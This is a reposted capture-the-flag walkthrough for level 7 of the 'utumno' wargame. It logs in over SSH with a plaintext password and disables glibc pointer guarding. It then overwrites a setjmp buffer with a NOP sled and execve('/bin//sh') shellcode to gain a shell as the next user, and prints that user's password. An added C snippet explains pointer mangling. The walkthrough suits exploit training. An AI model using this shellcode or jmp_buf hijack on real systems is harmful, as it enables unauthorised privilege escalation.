utumno - 7

Source: Internet  Editor: 程序博客网  Time: 2024/06/01 09:54
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250
utumno7@178.79.134.250's password: totiquegae
utumno7@melinda:~$ mkdir /tmp/utu7
utumno7@melinda:~$ cd /tmp/utu7
utumno7@melinda:~$ export LD_POINTER_GUARD=0

(LD_POINTER_GUARD (glibc since 2.4): Set to 0 to disable pointer guarding. Any other value enables pointer guarding, which is also the default. Pointer guarding is a security mechanism whereby some pointers to code stored in writable program memory (return addresses saved by setjmp(3) or function pointers used by various glibc internals) are mangled semi-randomly to make it more difficult for an attacker to hijack the pointers for use in the event of a buffer overrun or stack-smashing attack.)


# stack environment
---------
eip (rol eip, 0x09 ; rotate left 9 bits)
---------
esp (rol esp, 0x09 ; rotate left 9 bits)
---------
ebp
---------
edi
---------
esi
---------
ebx
--------- jmp_buf (esp + 0x90)
128B
--------- buffer (esp + 0x10)

# We use gdb to get the buffer address. It is 0xffffd420.
# rol 0xffffd420, 0x9 == 0xffa841ff
# We set jmp_buf.esp = 0xffa841ff, jmp_buf.eip = 0xffa841ff
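The arithmetic above, as an added C example that is not part of the original write-up: it models glibc's i386 pointer mangling (XOR with the pointer guard, then rol 9) and shows that a value built with a plain rol 9 demangles to the buffer address only when the guard is 0. The guard constant and the function names are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* 32-bit rotate helpers (i386 jmp_buf slots are 32 bits wide). */
static uint32_t rol32(uint32_t v, unsigned n) { return (v << n) | (v >> (32 - n)); }
static uint32_t ror32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }

/* Model of what setjmp stores for esp/eip: XOR with the guard, then rol 9. */
uint32_t ptr_mangle(uint32_t ptr, uint32_t guard) { return rol32(ptr ^ guard, 9); }

/* Model of what longjmp does before using the slot: ror 9, then XOR. */
uint32_t ptr_demangle(uint32_t stored, uint32_t guard) { return ror32(stored, 9) ^ guard; }

int main(void) {
    const uint32_t buffer = 0xffffd420u;  /* buffer address from the write-up */
    const uint32_t guard  = 0x5bd1e995u;  /* constructed sample guard value */

    /* LD_POINTER_GUARD=0: the XOR is a no-op, so the stored form is just rol 9. */
    uint32_t stored = ptr_mangle(buffer, 0);
    printf("guard = 0 : stored 0x%08x -> longjmp target 0x%08x\n",
           (unsigned)stored, (unsigned)ptr_demangle(stored, 0));

    /* Guard enabled: the same stored value demangles to an unrelated address. */
    printf("guard set : stored 0x%08x -> longjmp target 0x%08x\n",
           (unsigned)stored, (unsigned)ptr_demangle(stored, guard));
    return 0;
}
```

With pointer guarding left on, a jmp_buf entry written without knowledge of the per-process guard does not resolve to the chosen address. Later glibc releases ignore LD_POINTER_GUARD and keep pointer guarding always enabled.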

utumno7@melinda:/tmp/utu7$ /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
^Z
[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
utumno7@melinda:/tmp/utu7$ jobs -l
[1]+ 27875 Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
utumno7@melinda:/tmp/utu7$ kill -10 27875
utumno7@melinda:/tmp/utu7$ fg
/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
^Z
[1]+  Stopped                 /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
utumno7@melinda:/tmp/utu7$ kill -12 27875
utumno7@melinda:/tmp/utu7$ fg
/utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'`
$ whoami
utumno8
$ cat /etc/utumno_pass/utumno8
jaeyeetiav
$

ref[1]: http://hacktracking.blogspot.com/2013/06/utumno-wargame-level-7.html
